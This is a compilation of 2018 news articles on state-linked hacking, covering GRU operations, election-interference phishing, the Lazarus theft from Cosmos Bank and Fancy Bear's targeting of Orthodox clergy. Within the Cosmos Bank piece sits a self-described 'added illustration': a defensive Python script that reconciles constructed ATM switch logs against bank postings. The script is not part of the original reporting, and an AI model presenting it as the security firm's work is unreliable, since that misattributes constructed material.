It is the most shadowy of Russia's secret services. When its previous director Igor Sergun died in 2016, the Kremlin announcement was so terse that it gave neither the date nor the cause or place of death.

The agency has an apparently broad mandate. According to the Defense Ministry website, it is tasked not only with "ensuring conditions conducive to the successful implementation of the Russian Federation's defense and security policy" but with providing officials intelligence "that they need to make decisions in the political, economic, defense, scientific, technical and environmental areas."


Britain claims that two GRU agents carried out this spring's attack with the nerve agent Novichok on Sergei Skripal, a former GRU officer who became a British double agent, and his daughter. Both survived the poisoning in the city of Salisbury, but three months later two area residents were sickened by the same nerve agent, one of them fatally — it is believed they found the discarded bottle that had carried the Skripals' poison.

This week's claim came less than two months after the U.S. indicted 12 alleged GRU agents for hacking into the Hillary Clinton presidential campaign and the Democratic Party and releasing tens of thousands of private communications, part of a sweeping conspiracy by the Kremlin to meddle in the 2016 U.S. election.

Also this year, the investigative group Bellingcat reported that a GRU officer was in charge of operations in eastern Ukraine, where Russia-backed separatists were fighting Ukrainian forces, in July 2014 when a Malaysian passenger airliner was shot down, killing all 298 people aboard. International investigators say the plane was shot down by a mobile missile launcher brought in from Russia. The GRU officer named by Bellingcat reportedly was responsible for weapons transfers.

Russia's RBC news service reported this year that the GRU oversees Russian mercenaries in Syria, fighting there as a so-called shadow army.

Russian authorities generally deny allegations against the GRU and refuse to discuss its activities. They said they didn't recognize the suspects Britain named Wednesday in the Salisbury poisoning.


The GRU is one arm of Russia's extensive security and intelligence apparatus, which also includes the Foreign Intelligence Service, known as the SVR, and the Federal Security Service, or FSB, which conducts domestic intelligence and counterintelligence. The SVR and FSB were spun off from the KGB after the collapse of the Soviet Union. A former KGB agent, Vladimir Putin ran the FSB before ascending to the presidency.

And as president, Putin names the top brass in the GRU. Of all the agencies, the FSB looms largest in Russians' minds because it hunts domestic threats. The GRU, created under Soviet founder Vladimir Lenin, has a more ruthless reputation, but focuses its energies on foreign threats.

The agencies' operations appear to both compete and cooperate.

Pavel Felgenhauer, an independent Moscow-based military analyst, told The Associated Press that if "the SVR runs into military intelligence, they have to share it with the GRU; that means they try not to run into military intelligence and tell their agents not to report anything military even if they know it. The other way around, military or GRU assets are asked never to report anything political."

But in the case of the alleged U.S. election-related hacking, he said, "I believe that was an inter-service operation, because it's not military but they gained some kind of hacking access and then they shared it with the FSB and the SVR."

'Five Eyes' Agencies Demand Reignites Encryption Debate
5.9.18 securityweek  BigBrothers

Privacy and human rights organizations expressed concern Tuesday after a coalition of intelligence agencies renewed a call for technology companies to allow so-called "backdoor" access to encrypted content and devices.

The reaction came following a weekend statement from the "Five Eyes" intelligence agencies calling on "industry partners" to provide a way for law enforcement to access encrypted content that may not be available even with a search warrant.

The call by the agencies from the United States, Britain, Canada, Australia and New Zealand threatens to reignite a long-simmering debate on encryption.

"Many of the same means of encryption that are being used to protect personal, commercial and government information are also being used by criminals, including child sex offenders, terrorists and organized crime groups to frustrate investigations and avoid detection and prosecution," said the statement from the five countries issued by Australia's Department of Home Affairs.

Without voluntary cooperation, the agencies said, "we may pursue technological, enforcement, legislative or other measures to achieve lawful access solutions."

While some law enforcement agencies contend that encryption is being used to shield criminal activity, tech firms and privacy activists argue that any weakening of encryption would harm security for all users.

"The risk is that these countries will compel providers to build a backdoor that not only governments will exploit but hackers, criminals and other bad guys will use as well," said Greg Nojeim of the Washington-based Center for Democracy & Technology.

"It would weaken cybersecurity at the same time governments are preaching that cybersecurity needs to be addressed."

Marc Rotenberg, president of the Electronic Privacy Information Center, called the latest effort "a short-sighted and counterproductive proposal" and added that "it has become clear that encryption is vital for both privacy and public safety."

Similar concerns were voiced by Amnesty International, which said in a tweet, "This won't make us safer -- it will just weaken security for everyone."

Debate on 'going dark'

Encryption has been a hot-button issue in the United States for years, and came to a head in 2016 when Apple challenged the FBI's request to create software that would enable investigators to access an iPhone used by an attacker in a 2015 mass shooting in San Bernardino, California.

The US government eventually dropped its demand after finding another means to access the device, but a number of law enforcement officials have complained that they are "going dark" with the use of encrypted apps and devices that cannot be accessed by traditional wiretaps.

Nojeim said the claim of "going dark" is vastly exaggerated.

"There has never been more electronic information available to assist criminal and intelligence investigations," he said.

"We leave a digital footprint with virtually everything we do online and most of those footprints can be collected without the hindrance of encryption."

But James Lewis of the Center for Strategic and International Studies, who supports better law enforcement access, said tech firms may face more pressure than in the past.

"It's part of the bigger public move to rein in the tech companies and make them more socially responsible," Lewis said. "The old laissez-faire arguments are losing ground."

Will Russian Hackers Affect This Year's US Election?
4.9.18 securityweek  BigBrothers

Nearly a year after Russian government hackers meddled in the 2016 U.S. election, researchers at cybersecurity firm Trend Micro zeroed in on a new sign of trouble: a group of suspect websites.

The sites mimicked a portal used by U.S. senators and their staffs, with easy-to-miss discrepancies. Emails to Senate users urged them to reset their passwords — an apparent attempt to steal them.

Once again, hackers on the outside of the American political system were probing for a way in.

"Their attack methods continue to take advantage of human nature and when you get into an election cycle the targets are very public," said Mark Nunnikhoven, vice president of cloud research at Trend Micro.

Now the U.S. has entered a new election cycle. And the attempt to infiltrate the Senate network, linked to hackers aligned with Russia and brought to public attention in July, is a reminder of the risks, and the difficulty of assessing them.

Newly reported attempts at infiltration and social media manipulation — which Moscow officially denies — point to Russia's continued interest in meddling in U.S. politics. There is no clear evidence, experts said, of efforts by the Kremlin specifically designed to disrupt elections in November. But it wouldn't take much to cause turmoil.

"It's not a question of whether somebody is going to try to breach the system, to manipulate the system, to influence the system," said Robby Mook, who managed Hillary Clinton's presidential campaign and co-directs a Harvard University project to protect democracy from cyberattacks, in an interview earlier this year. "The question is: Are we prepared for it?"

Online targeting of the U.S. political system has come on three fronts — efforts to get inside political campaigns and institutions and expose damaging information; probes of electoral systems, potentially to alter voter data and results; and fake ads and accounts on social media used to spread disinformation and fan divisions among Americans.

In recent weeks, Microsoft reported that it had disabled six Russian-launched websites masquerading as U.S. think tanks and Senate sites. Facebook and the security firm FireEye revealed influence campaigns, originating in Iran and Russia, that led the social network to remove 652 impostor accounts, some targeted at Americans. The office of Republican Sen. Pat Toomey of Pennsylvania said hackers tied to a "nation-state" had sent phishing emails to old campaign email accounts.

U.S. officials said they have not detected any attempts to corrupt election systems or leak information rivaling Kremlin hacking before President Donald Trump's surprise 2016 victory.

Still, "we fully realize that we are just one click away of the keyboard from a similar situation repeating itself," Dan Coats, the director of national intelligence, said in July.

Michael McFaul, the architect of the Obama administration's Russia policy, has said he believes Russian President Vladimir Putin perceives little benefit in a major disruption effort this year, preferring to keep his powder dry for the 2020 presidential contest.

But even if the upcoming elections escape disruption, that hardly means the U.S. is in the clear.

Trump's decision in May to eliminate the post of White House cybersecurity coordinator confirmed his lack of interest in countering Russian meddling, critics say. Congress has not delivered any legislation to combat election interference or disinformation. Last week, a review of the bipartisan "Secure Elections Act" was canceled after Republican leaders registered objections, congressional staffers said.

The risks extend beyond the midterms.

"The biggest question is going to be how are you going to make sure that people actually trust the results, because democracy relies on credibility," said Ben Nimmo, a researcher at the Atlantic Council. "It's not over after November."

Experts said it is too late to safeguard U.S. voting systems and campaigns this election cycle. But with two months to go, there is time enough to take stock of the Russian-sponsored interference that has come to light so far — and to assess the risks of what we don't know.

In mid-2016, hackers found a way into the voter registration database at the Illinois State Board of Elections and spent three weeks poking around. After the breach was discovered, officials said the infiltrators had downloaded the records of up to 90,000 voters.

It's not clear that anything nefarious was done with those records. But when special counsel Robert Mueller charged a dozen Russian intelligence agents with hacking this July, the indictment clarified the potential for damage. The hackers had, in fact, stolen information on 500,000 voters, including dates of birth and partial Social Security numbers.

"The internet allows foreign adversaries to attack Americans in new and unexpected ways," Deputy Attorney General Rod Rosenstein said, in announcing the indictments.

The Illinois hack is the most notable case of foreign tampering with U.S. election systems to come to light. There has been no evidence of efforts to change voter information or tamper with voting machines, though experts caution hackers might have planted unseen malware in far-flung election systems that could be triggered later.

Potential problems are not limited to Illinois.

A week before the 2016 general election, Russian intelligence agents sent spear-phishing emails to 122 local elections officials who were customers of VR Systems, a Tallahassee, Florida-based election software vendor.

In addition to Illinois, at least 20 other state systems were probed by the same Russian military unit that targeted VR's customers, federal officials said.

"My unofficial opinion is that we're kind of fooling ourselves if we don't think that they tried to at least make a pass at all 50 states," said Christopher Krebs, the undersecretary for critical infrastructure at DHS.

In June 2017, the federal Election Assistance Commission informed dozens of local voting officials that hackers had attempted to penetrate the systems of a voting system manufacturer, presumed by many to be VR.

"Attempts have been made to obtain voting equipment, security information and in general to probe for vulnerabilities," the EAC wrote officials. Despite those concerns, federal officials have moved slowly to share intelligence with officials who supervise elections. As of mid-August, 92 state officials had been given clearances.

Much of the machinery used to collect and tabulate votes is antiquated, built by a handful of unregulated and secretive vendors, with outdated software that makes them highly vulnerable to attacks, researchers said.

"If someone was able to compromise even a handful of voting machines I think that would be sufficient to cause people to not trust the system," said Sherri Ramsay, a former National Security Agency senior executive.

This spring, a website used by Knox County, Tennessee, officials to display election-night results was knocked offline by an unidentified perpetrator. While the attack was little noticed, it would not be hard to replicate, experts said. Combined with a social media campaign alleging vote tampering, such mischief could cast a shadow over an election, they said.

Election officials have been sandboxing such scenarios for weeks as they prepare for November's balloting.

There's already a Russian playbook for thwarting an election: In Ukraine in 2014, the presidential contest was disrupted by a virus that scrambled election-management software, followed by a media disinformation campaign claiming a pro-Moscow candidate had won.

Democratic Sen. Claire McCaskill of Missouri is plenty busy this fall as she seeks re-election in a state that voted overwhelmingly for Trump. So when an attempt by Russian hackers to infiltrate her campaign came to light in July, she acknowledged it only briefly.

"While this attack was not successful, it is outrageous that they think they can get away with this," McCaskill said. "I will not be intimidated. I've said it before and I will say it again, Putin is a thug and a bully."

The failed hack, which included an attempt to steal the password of at least one McCaskill staffer through a fake Senate login website identified by Microsoft, is the most notable instance of attempted campaign meddling by Russia made public this year.

Microsoft executives said recently that the company had detected attempts by Russia's GRU military intelligence agency to hack two senators. One was presumably McCaskill, but the others have not been identified.

The group behind that attempt, Fancy Bear, is the same one indicted July 13 and identified by Microsoft as the creator of fake websites targeting the Hudson Institute and the International Republican Institute, frequent critics of the Kremlin. Since the summer of 2017, Fancy Bear has aggressively targeted political groups, universities, law enforcement agencies and anti-corruption nonprofits in the U.S. and elsewhere, according to Trend Micro.

"Russian hackers appear to be broadening their target set, but I think tying it to the midterm elections is pure speculation at this point," said Michael Connell, an analyst at the federally funded Center for Naval Analyses in Arlington, Virginia.

There have been other recent reports of U.S. congressional campaign websites targeted by hackers, but that doesn't mean Russian agents are to blame. Experts said most are likely run-of-the-mill criminal cyberattacks seeking financial gain rather than political change.

But Eric Rosenbach, who served as assistant secretary of defense for global security during President Barack Obama's administration and is now at Harvard, said the limited examples of Russian intrusion that have come to light may be only a tip to more significant, still hidden schemes.

"There probably have already been compromises of important campaigns in places where it could sway the outcome or undermine trust in the election," Rosenbach said. "We might not see that until the very last moment."

The risk is magnified by poor efforts to protect many campaign sites, said Josh Franklin, until last month the lead National Institute of Standards and Technology researcher on voting systems security.

Nearly a third of the 527 House of Representatives campaigns examined by Franklin and fellow researchers had such poor cybersecurity they were graded worse than failing.

"We couldn't go any further with our scan," he said. "We were told that we would be in danger of being sued by the candidate campaigns."

By the time a group called "ReSisters" began organizing a rally against white nationalism for Aug. 10, it had spent more than a year sharing left-wing posts about feminism, immigration and other hot-button topics.

"Confront + Resist Fascism," the group urged on a Facebook event page for its "No Unite the Right 2" protest in Washington, D.C. Like-minded Facebook users posted information about transportation, materials and location so those interested could attend.

In late July, Facebook short-circuited the effort, shutting down the pages and accounts of ReSisters and 31 others. Despite appearing to speak for Americans, the company said, the accounts were planted by unidentified outsiders to fuel divisions among U.S. voters. Researchers at the Atlantic Council who examined the accounts said they acted in ways echoing Russian troll operations before the 2016 election, pointing to English on the pages speckled with grammatical mistakes typical of native Russian speakers.

"We face determined, well-funded adversaries who will never give up and are constantly changing tactics," Facebook said. The outing of the sites is a reminder as November approaches that Russians and other foreign actors continue to use social media to try to influence U.S. politics.

Since the 2016 election, officials and researchers have learned much more about such infiltration. The May release by House Democrats of more than 3,500 ads placed on Facebook by Russian agents from 2015 to 2017 revealed a deliberate campaign to inflame racial divisions in the U.S. Facebook and other tech companies say they are working hard to combat such behavior. But it is not nearly enough, experts said.

The companies must be forced to act faster against Russian and other disinformation campaigns and be made more accountable, said Dipayan Ghosh, a fellow at Harvard's Kennedy School of Government who has worked at both the White House and Facebook on tech policy including social media manipulation.

Ghosh said quantifying Russian disinformation on social media is difficult because they "are operating behind a commercial veil" of for-profit networks that are not subject to public scrutiny.

"The industry is currently accountable to nobody," Ghosh said.

After Facebook was criticized for allowing a data-mining firm to collect information about millions of its users, CEO Mark Zuckerberg said he was open to regulation. But the "Honest Ads Act," which would require online political ads to be identified as they are in traditional media, has stalled in Congress.

The bill's sponsors include the late John McCain and Sen. Mark Warner, the Virginia Democrat who has pressed Facebook for change since the 2016 elections. Executives from Facebook, Twitter and Google are expected to testify before Warner and other members of the Senate Intelligence Committee this week.

Experts said they are uncertain of the effectiveness of Russian disinformation, complicating assessment of the threat it might now pose.

In 2016, Russian actors likely did the greatest damage by hacking and leaking emails from Hillary Clinton's campaign and Democrats' national organization, which were widely reported by the news media. But comparatively few American voters saw individual pieces of misinformation on social media, making it unlikely that it swayed votes, said Brendan Nyhan, a University of Michigan political scientist who has analyzed the scope and impact of the Russian operations.

"There's still too much simplistic thinking about all-powerful propaganda that doesn't correspond to what we know from social science about how hard it is to change people's minds. I'm more concerned about the threat of intensifying polarization and calling the legitimacy of elections into question than I am about massive swings in vote choice," he said.

Still, it is clear that Russian intelligence views its efforts as successful and their example has already stirred others, like Iran, to try similar strategies. Such efforts are bent on coloring U.S. politics even if they are not tied to a specific election, said Lee Foster, FireEye's manager of information operations analysis.

"Where do you draw the line between efforts to influence the election or an election or efforts to influence U.S. domestic politics in general?" Foster said. "We can't just think in the context of the next election. It's not like this goes away after the midterms."

Lithuanian Media Sign Pact With Govt to Counter Hackers
30.8.18 securityweek BigBrothers

Lithuania's major online media outlets on Tuesday signed an agreement to work with the defence ministry as they try to fend off a growing barrage of cyber attacks, largely blamed on Russia.

Fears are increasing over possible meddling in elections next year in the Baltic EU and NATO state, where hackers have planted fake news stories on media organizations' websites, or crashed them altogether.

Warning that cyberattacks can sow "great chaos in society and in the state", Defence Minister Raimundas Karoblis said Tuesday that the state felt compelled to cooperate with the media to combat the attacks.

Under the agreement media groups will share information and strategies with government, while press representatives will be able to attend meetings of the National Cyber Security Council.

Lithuania's defence ministry has said attacks are becoming "more and more coordinated, complex and refined", while intelligence services say most of the hostile cyber activity can be traced back to Russia.

The national intelligence agency warned in March that "Russian hackers will likely use cyber tools to influence the upcoming elections in Lithuania in 2019", referring to upcoming presidential, local and European ballots.

Lithuanian online media outlets have crashed on numerous occasions in recent years after being subject to so-called distributed denial of service, or DDoS, attacks.

Last year hackers posted a fake news story on the site of the Baltic News Service (BNS) newswire alleging that a group of US troops in Latvia had been exposed to mustard gas.

Hackers also planted a fake news story about Karoblis coming out as being gay on the Tv3.lt news website earlier this year.

Moscow has long objected to Lithuania's drive to join western institutions after it became the first republic to break free from the crumbling Soviet Union in 1990.

Telegram Says to Cooperate in Terror Probes, Except in Russia
29.8.18 securityweek Social  BigBrothers

The Telegram encrypted messenger app said Tuesday it would cooperate with investigators in terror probes when ordered by courts, except in Russia, where it is locked in an ongoing battle with authorities.

The company founded by Russian Pavel Durov has refused to provide authorities in the country with a way to read its communications and was banned by a Moscow court in April as a result.

But in its updated privacy settings, Telegram said it would disclose its users' data to "the relevant authorities" elsewhere if it receives a court order to do so, although not in Russia.

"If Telegram receives a court order that confirms you're a terror suspect, we may disclose your IP address and phone number to the relevant authorities," Telegram's new privacy settings said.

"So far, this has never happened. When it does, we will include it in a semiannual transparency report," the app added.

Durov said the new privacy terms were adopted to "comply with new European laws on protecting private data."

But Durov assured his Russian users that Telegram would continue to withhold their data from security services.

"In Russia, Telegram is asked to disclose not the phone numbers or IP addresses of terrorists based on a court decision, but access to the messages of all users," he wrote on his Telegram channel.

He added that since Telegram is illegal in Russia, "we do not consider the request of Russian secret services and our confidentiality policy does not affect the situation in Russia."

Durov has long said he would reject any attempt by the country's security services to gain backdoor access to the app.

Telegram lets people exchange messages, stickers, photos and videos in groups of up to 5,000 people. It has attracted more than 200 million users since its launch by Durov and his brother Nikolai in 2013.

Russia has acted to curb internet freedoms as social media has become the main way to organise demonstrations.

Authorities stepped up the heat on popular websites after Vladimir Putin started his fourth Kremlin term in 2012, ostensibly to fight terrorism but analysts say the real motive was to muzzle Kremlin critics.

According to the independent rights group Agora, 43 people were given prison terms for internet posts in Russia in 2017.

Tech companies have had difficulty balancing the privacy of users against law enforcement, with encryption of communications adding a layer of complexity to cooperating with authorities.

One of Telegram's rival apps, Facebook-owned WhatsApp, says it complies with authorities in accordance with "applicable law".

Google Tells Toomey Hackers Tried to Infiltrate Staff Email
28.8.18 securityweek Hacking  BigBrothers

Google has alerted U.S. Sen. Pat Toomey's office that hackers with ties to a "nation-state" sent phishing emails to old campaign email accounts, a spokesman for the Pennsylvania Republican said Friday.

Toomey's office was notified this week about the attempt to infiltrate email accounts, said spokesman Steve Kelly. He said the dormant accounts hadn't been used since the end of the 2016 campaign, and the staffers they're attached to no longer work for Toomey. The nation-state wasn't identified.

"This underscores the cybersecurity threats our government, campaigns, and elections are currently facing," he said. "It is essential that Congress impose tough penalties on any entity that undermines our institutions."

Toomey currently isn't running for office and the effort would not have affected the upcoming midterm elections.

Google told Toomey's office that the emails appeared to be exploratory, Kelly said. Based on scans for spam, phishing and malware, the emails likely did not contain malware or links to a credential-phishing site, he said.

A Google spokesman said the company wasn't commenting on the phishing attempt.

The notification is the latest by a tech company of suspected Kremlin attempts to spy on U.S. elected officials and campaigns and potentially meddle in U.S. politics.

Google's warning to Toomey comes just weeks after a Microsoft discovery led Sen. Claire McCaskill, a Missouri Democrat who is running for re-election, to reveal that state-backed Russian hackers tried unsuccessfully to infiltrate her Senate computer network last fall.

That effort recalled what U.S. prosecutors called in a July 13 indictment a concerted effort by Russian military operatives ahead of the 2016 election focused on helping to elect Republican Donald Trump to the presidency by exposing internal divisions in the Democratic Party meant to discredit his opponent, Hillary Clinton. The indictment says the Russian agents broke into Democratic national organization servers and stole and leaked damaging emails.

On Tuesday, Microsoft disclosed what it called new Russian espionage efforts targeting U.S. political groups — this time conservative Republican foes that have promoted sanctions to punish the Kremlin for military aggression against Ukraine.

The company said a group tied to the Russian government created fake websites — presumably to steal passwords or plant spyware— that appeared to spoof two American conservative organizations: the Hudson Institute and the International Republican Institute. Three other fake sites were designed to look as if they belonged to the U.S. Senate.

The Kremlin denied involvement.

North Korea-linked Hackers Stole $13.5 Million From Cosmos Bank: Report
28.8.18 securityweek APT  BigBrothers

The North Korea-linked hacking group Lazarus is said to have stolen $13.5 million in a recent cyber-attack targeting SWIFT/ATM infrastructure of Cosmos Bank.

The attackers likely gained access to the bank’s systems via spear phishing and/or a remote administration or third-party interface, and used multiple attack techniques to steal funds. The theft took place between August 10 and 13, 2018, according to researchers from Securonix.

Believed to be backed by the North Korean government, the Lazarus group was said last year to be the most serious threat to banks. This year, the hackers also focused heavily on crypto-currency exchanges and have been involved in numerous attacks against such organizations.

A recent report also revealed that most malware families originating from North Korea can be linked to Lazarus via code reuse.

Now, Securonix security researchers reveal that Lazarus was behind a high-profile ATM/SWIFT banking attack involving the Cosmos Bank, a 112-year-old cooperative bank in India and the second largest in the country.

As part of the incident, the hackers are believed to have leveraged a previously established foothold before compromising the bank’s internal and ATM infrastructure on August 10-11.

Likely abusing vendor ATM test software or modifying the currently deployed ATM payment switch software, they set up a malicious ATM/POS switch and hijacked the connection between the central switch and the backend/Core Banking System (CBS).

Next, they made adjustments to the target account balances to enable withdrawals and leveraged the malicious switch to authorize ATM withdrawals for over $11.5 million in tens of thousands of domestic and international transactions, using 450 cloned (non-EMV) debit cards in 28 countries.

The malicious switch was used to send fake messages authorizing the transactions and to prevent the details sent from the payment switch from reaching the CBS (so checks on card number, card status, PIN and more were never performed).

On August 13, 2018, likely following lateral movement, the threat actor abused compromised LSO/RSO authentication in the Cosmos Bank’s SWIFT SAA environment to send three international wire transfer requests to ALM Trading Limited at Hang Seng Bank in Hong Kong, amounting to around $2 million.

“The ATM/POS banking switch that was compromised in the Cosmos Bank attack is a component that typically provides hosted ATM/POS terminal support, an interface to core banking solution (CBS) or another core financial system, and connectivity to regional, national or international networks. The primary purpose of the system is to perform transaction processing and routing decisions,” Securonix explains.

By focusing on the bank’s infrastructure instead of basic card-not-present (CNP), jackpotting or blackboxing fraud, the well-planned, highly coordinated attack was able to effectively bypass the bank’s layers of defense against ATM attacks.

The security firm attributes the attack to Lazarus, a group known for the use of Windows Admin Shares for Lateral Movement, the use of custom command and control (C&C) servers that mimic TLS, the use of Windows services for persistence, timestomping, and reflective DLL injection, along with other attack techniques.
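The control that catches the pattern described above is reconciliation: every withdrawal the switch approves must have a matching posting in the CBS, and a single card approved across many countries in a short window is a cloned-card indicator. The following is an added illustration, not Securonix's or the bank's code; the log formats, field names and records are constructed for this example.

```python
"""Reconcile ATM switch authorizations against Core Banking System (CBS) postings.

Added illustration; not Securonix's or the bank's code. Log formats and records
are constructed. Amounts are integers in minor units to avoid float comparisons.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class SwitchAuth:
    txn_id: str
    card: str        # masked PAN
    amount: int      # minor units
    country: str     # country of the acquiring ATM
    approved: bool


@dataclass(frozen=True)
class CbsPosting:
    txn_id: str
    card: str
    amount: int


def parse_switch_log(lines):
    """Constructed format: SW|<txn_id>|<masked card>|<amount>|<country>|<APPROVED|DECLINED>."""
    auths = []
    for line in lines:
        parts = line.strip().split("|")
        if len(parts) != 6 or parts[0] != "SW":
            continue  # ignore anything that is not a switch authorization record
        _, txn, card, amount, country, result = parts
        auths.append(SwitchAuth(txn, card, int(amount), country, result == "APPROVED"))
    return auths


def parse_cbs_log(lines):
    """Constructed format: CBS|<txn_id>|<masked card>|<amount>."""
    postings = []
    for line in lines:
        parts = line.strip().split("|")
        if len(parts) != 4 or parts[0] != "CBS":
            continue
        _, txn, card, amount = parts
        postings.append(CbsPosting(txn, card, int(amount)))
    return postings


def reconcile(auths, postings, max_countries_per_card=2):
    """Return (orphaned, mismatched, multi_country).

    orphaned      - switch-approved withdrawals with no CBS posting: the CBS never
                    validated card, status or PIN because the switch never asked it
    mismatched    - approvals whose CBS posting carries a different amount or card
    multi_country - cards approved in more countries than a cardholder plausibly
                    visited in the window (cloned-card indicator)
    """
    posted = {p.txn_id: p for p in postings}
    orphaned, mismatched = [], []
    countries = defaultdict(set)
    for a in auths:
        if not a.approved:
            continue
        countries[a.card].add(a.country)
        p = posted.get(a.txn_id)
        if p is None:
            orphaned.append(a)
        elif p.amount != a.amount or p.card != a.card:
            mismatched.append(a)
    multi_country = {card: sorted(c) for card, c in countries.items()
                     if len(c) > max_countries_per_card}
    return orphaned, mismatched, multi_country


# Constructed sample: two legitimate withdrawals, three switch-only approvals
# for one cloned card used in three countries, and one amount mismatch.
SWITCH_LOG = """
SW|t1001|411111******1111|20000|IN|APPROVED
SW|t1002|411111******2222|5000|IN|DECLINED
SW|t1003|522222******3333|100000|CA|APPROVED
SW|t1004|522222******3333|100000|GB|APPROVED
SW|t1005|522222******3333|100000|HK|APPROVED
SW|t1006|411111******4444|15000|IN|APPROVED
""".strip().splitlines()

CBS_LOG = """
CBS|t1001|411111******1111|20000
CBS|t1006|411111******4444|10000
""".strip().splitlines()


if __name__ == "__main__":
    orphaned, mismatched, multi = reconcile(parse_switch_log(SWITCH_LOG), parse_cbs_log(CBS_LOG))
    for a in orphaned:
        print(f"ORPHANED  {a.txn_id} {a.card} {a.amount} {a.country}")
    for a in mismatched:
        print(f"MISMATCH  {a.txn_id} {a.card} switch={a.amount}")
    for card, cc in multi.items():
        print(f"MULTI-COUNTRY {card} {cc}")
```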

Sacrilegious Spies: Russians Tried Hacking Orthodox Clergy
28.8.18 securityweek BigBrothers

Russian Hackers Who Bedeviled 2016 U.S. Election Also Spied on Senior Orthodox Christian Figures

LONDON (AP) — The Russian hackers indicted by the U.S. special prosecutor last month have spent years trying to steal the private correspondence of some of the world's most senior Orthodox Christian figures, The Associated Press has found, illustrating the high stakes as Kiev and Moscow wrestle over the religious future of Ukraine.

The targets included top aides to Ecumenical Patriarch Bartholomew I, who often is described as the first among equals of the world's Eastern Orthodox Christian leaders.

The Istanbul-based patriarch is currently mulling whether to accept a Ukrainian bid to tear that country's church from its association with Russia, a potential split fueled by the armed conflict between Ukrainian military forces and Russia-backed separatists in eastern Ukraine.

The AP's evidence comes from a hit list of 4,700 email addresses supplied last year by Secureworks, a subsidiary of Dell Technologies.

The AP has been mining the data for months, uncovering how a group of Russian hackers widely known as Fancy Bear tried to break into the emails of U.S. Democrats, defense contractors, intelligence workers, international journalists and even American military wives. In July, as part of special counsel Robert Mueller's ongoing investigation into Russian interference in the 2016 U.S. election, a U.S. grand jury identified 12 Russian intelligence agents as being behind the group's hack-and-leak assault against Hillary Clinton's presidential campaign.

The targeting of high-profile religious figures demonstrates the wide net cast by the cyberspies.

Patriarch Bartholomew claims the exclusive right to grant a "Tomos of Autocephaly," or full ecclesiastic independence, sought by the Ukrainians. It would be a momentous step, splitting the world's largest Eastern Orthodox denomination and severely eroding the power and prestige of the Moscow Patriarchate, which has positioned itself as a leading player within the global Orthodox community.

Ukraine is lobbying hard for a religious divorce from Russia and some observers say the issue could be decided as soon as next month.

"If something like this will take place on their doorstep, it would be a huge blow to the claims of Moscow's transnational role," said Vasilios Makrides, a specialist in Orthodox Christianity at the University of Erfurt in Germany. "It's something I don't think they will accept."

The Kremlin is scrambling to help Moscow's Patriarch Kirill retain his traditional role as the head of the Ukrainian Orthodox Church and "the more they know, the better it is for them," Makrides said.

The Russian Orthodox Church said it had no information about the hacking and declined comment. Russian officials referred the AP to previous denials by the Kremlin that it has anything to do with Fancy Bear, despite a growing body of evidence to the contrary.

Ukrainian President Petro Poroshenko flew to Istanbul in April in an effort to convince the patriarch to agree to a split, which he has described as "a matter of our independence and our national security." Moscow's Patriarch Kirill is flying to Turkey later this week in a last-ditch bid to prevent it.

Hilarion Alfeyev, Kirill's representative abroad, has warned that granting the Tomos could lead to the biggest Christian schism since 1054, when Catholic and Orthodox believers parted ways.

"If such a thing happens, Orthodox unity will be buried," Alfeyev said.

The issue is an extraordinarily sensitive one for the Ecumenical Patriarchate. Reached by phone, spokesman Nikos-Giorgos Papachristou said: "I don't want to be a part of this story."

Other church officials spoke to the AP about the hacking on condition of anonymity, saying they did not have authorization to speak to the media.

Bartholomew, who is 78, does not use email, those church officials told AP. But his aides do, and the Secureworks list spells out several attempts to crack their Gmail accounts.

Among them were several senior church officials called metropolitans, who are roughly equivalent to archbishops in the Catholic tradition. Those include Bartholomew Samaras, a key confidant of the patriarch; Emmanuel Adamakis, an influential hierarch in the church; and Elpidophoros Lambriniadis, who heads a prestigious seminary on the Turkish island of Halki. All are involved in the Tomos issue; none returned recent AP messages seeking comment.

Spy games have long been a part of the Russian Orthodox world.

The Soviet Union slaughtered tens of thousands of priests in the 1930s, but the Communists later took what survived of the church and brought it under the sway of Russia's secret police, the KGB, with clerics conscripted to spy on congregants and emigres.

The nexus between Russia's intelligence and religious establishments survived the 1991 fall of the Soviet Union and the KGB's reorganization into the FSB, according to Moscow-based political analyst Dmitry Oreshkin.

"Our church leaders are connected to the FSB and their epaulettes stick out from under their habits," Oreshkin said. "They provide Vladimir Putin's policy with an ideological foundation."

That might make one target found by the AP seem curious: The Moscow Patriarch's press secretary, Alexander Volkov.

But Orthodox theologian Cyril Hovorun said he wouldn't be surprised to see a Russian group spying on targets close to home, saying, "they're probably checking him out just in case."

Volkov did not return AP emails seeking comment.

Hovorun is unusually qualified to speak on the issue. In 2012 he — like Volkov — was an official within the Moscow Patriarchate. But he resigned after someone leaked emails showing that he secretly supported independence-leaning Ukrainian clergy.

Hovorun has since been targeted by the Russian hackers, according to the data from Secureworks, which uses the name Iron Twilight to refer to the group.

Hovorun said he believes that those who published his emails six years ago weren't related to Fancy Bear, but he noted that their modus operandi — stealing messages and then publishing them selectively — was the same.

"We've known about this tactic before the hacking of the Democrats," Hovorun said, referring to the email disclosures that rocked America's 2016 presidential campaign. "This is a familiar story for us."

The Russian hackers' religious dragnet also extended to the United States and went beyond Orthodox Christians, taking in Muslims, Jews and Catholics whose activities might conceivably be of interest to the Russian government.

John Jillions, the chancellor of the Orthodox Church in America, provided the AP with a June 19, 2015, phishing email that Secureworks later confirmed was sent to him by Fancy Bear.

Fancy Bear also went after Ummah, an umbrella group for Ukrainian Muslims; the papal nuncio in Kiev; and an account associated with the Ukrainian Greek-Catholic Church, a Byzantine rite church that accepts the authority of the Vatican, the Secureworks data shows.

Also on the hit list: Yosyp Zisels, who directs Ukraine's Association of Jewish Organizations and Communities and has frequently been quoted defending his country from charges of anti-Semitism. Zisels said he had no knowledge of the attempted hacking. Vatican officials did not return messages.

Protestants were targeted too, including three prominent Quakers operating in the Moscow area.

Hovorun said Protestants were viewed with particularly intense suspicion by the Kremlin.

"There is an opinion shared by many in the Russian establishment that all those religious groups — like Quakers, evangelicals — they are connected to the American establishment," he said.

Secureworks' data shows hacking attempts on religious targets that took place in 2015 and 2016, but other material obtained by the AP suggests attempts to compromise the Ecumenical Patriarchate are ongoing.

On Oct. 16, 2017, an email purporting to come from Papachristou, who was just being appointed as spokesman, arrived in the inboxes of about a dozen Orthodox figures.

"Dear Hierarchs, Fathers, Brothers and Sisters in Christ!" it began, explaining that Papachristou was stepping into his new role as director of communications. "It's a very big joy for me to serve the Church on this position. Some suggestions on how to build up relations with the public and the press are provided in the file attached."

The file was rigged to install surveillance software on the recipients' computers.

